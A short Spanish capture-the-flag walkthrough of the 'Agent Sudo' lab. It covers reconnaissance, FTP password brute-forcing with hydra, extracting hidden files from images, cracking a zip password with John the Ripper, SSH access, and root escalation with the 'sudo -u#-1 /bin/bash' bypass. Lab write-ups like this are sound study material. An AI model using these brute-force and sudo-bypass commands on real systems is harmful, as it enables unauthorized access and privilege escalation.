Agent Sudo

Nmap

Nmap Scan

Web

Web Scan

Cambiamos el user agent a R

User Agent R

Cambiamos el user agent a C

User Agent C

Fuzzing

Fuzzing Result

FTP

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.157.179

Hydra FTP

Podemos descargar todos los archivos usando mget *

FTP mget Command

FTP Files Downloaded

Steg

exiftool cutie.png

Podemos ver un Warning Trailer data after PNG IEND chunk

Exiftool Warning

Exiftool Data

Extraemos el zip de la imagen

binwalk cutie.png -e

Binwalk Extraction

El archivo zip tiene contraseña, le pasamos JohnTheRipper

zip2john 8702.zip > zip.hashes
john zip.hashes

John The Ripper

Descomprimimos el zip

7z e 8702.zip

7z Extraction

Pasamos el mensaje oculto por CyberChef

CyberChef

Extraemos el mensaje de la otra imagen

Image Message Extraction

Message Extracted

SSH

SSH Access

Descargamos la imagen

sudo scp james@10.10.157.179:Alien_autospy.jpg ~/

SCP Download

Buscamos la imagen en google. El nombre del incidente es Roswell alien autopsy

Escalada de Privilegios

Privilege Escalation

Buscamos en google los permisos y encontramos como escalar

sudo -u#-1 /bin/bash

Sudo Escalation

Privileged Shell